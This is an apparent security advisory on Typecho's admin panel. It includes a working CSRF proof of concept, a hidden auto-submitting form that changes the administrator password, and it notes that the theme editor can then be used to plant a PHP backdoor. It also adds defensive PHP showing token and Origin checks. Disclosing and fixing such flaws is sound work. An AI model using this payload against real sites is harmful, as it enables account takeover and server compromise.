[*] 1. Description
The change-password form on the http://typecho/admin/profile.php page has a CSRF vulnerability.
On the http://typecho/admin/themes.php page, we can write a PHP backdoor.
[*] 2. CSRF POC
<div style="display: none;">
<form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="password" value="bug1024"/>
<input type="hidden" name="confirm" value="bug1024" />
<input name="do" type="hidden" value="password" />
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 2000);
</script>
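A server-side check that rejects the auto-submitting form above, as an added example (not Typecho's own code and not part of the original advisory). The function names `csrf_token` and `is_request_allowed`, the `_csrf` field name and the `http://other-site.example` origin are assumptions made for illustration.

```php
<?php
// Added example, not Typecho code. All function and field names are hypothetical.

// Derive a per-session, per-action token from a secret kept server-side.
function csrf_token(string $sessionSecret, string $action): string
{
    return hash_hmac('sha256', $action, $sessionSecret);
}

// Accept a state-changing POST only if it carries the token for this session
// and, when the browser sent an Origin header, that origin is the site's own.
function is_request_allowed(array $post, array $headers, string $sessionSecret,
                            string $action, string $siteOrigin): bool
{
    $sent = $post['_csrf'] ?? '';
    // hash_equals compares in constant time, so the token cannot be guessed byte by byte.
    if (!is_string($sent) || !hash_equals(csrf_token($sessionSecret, $action), $sent)) {
        return false;
    }
    $origin = $headers['Origin'] ?? null;
    return $origin === null || $origin === $siteOrigin;
}

// Constructed sample data for the demonstration.
$secret = bin2hex(random_bytes(32));   // in a real application this lives in the session
$site   = 'http://typecho';
$action = 'users-profile';

// Request shaped like the cross-site form above: no token, foreign Origin.
$forged = ['password' => 'bug1024', 'confirm' => 'bug1024', 'do' => 'password'];
echo 'forged request allowed:  ';
var_dump(is_request_allowed($forged, ['Origin' => 'http://other-site.example'],
                            $secret, $action, $site));

// Request from the genuine profile page, which embeds the token in a hidden field.
$genuine = $forged + ['_csrf' => csrf_token($secret, $action)];
echo 'genuine request allowed: ';
var_dump(is_request_allowed($genuine, ['Origin' => $site], $secret, $action, $site));
```

Setting the session cookie's SameSite attribute to Lax or Strict adds a second layer, because the browser then omits the cookie on this kind of cross-site POST.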
[*] 3. GETSHELL
The http://typecho/admin/theme-editor.php page can be used to write a backdoor.
by http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html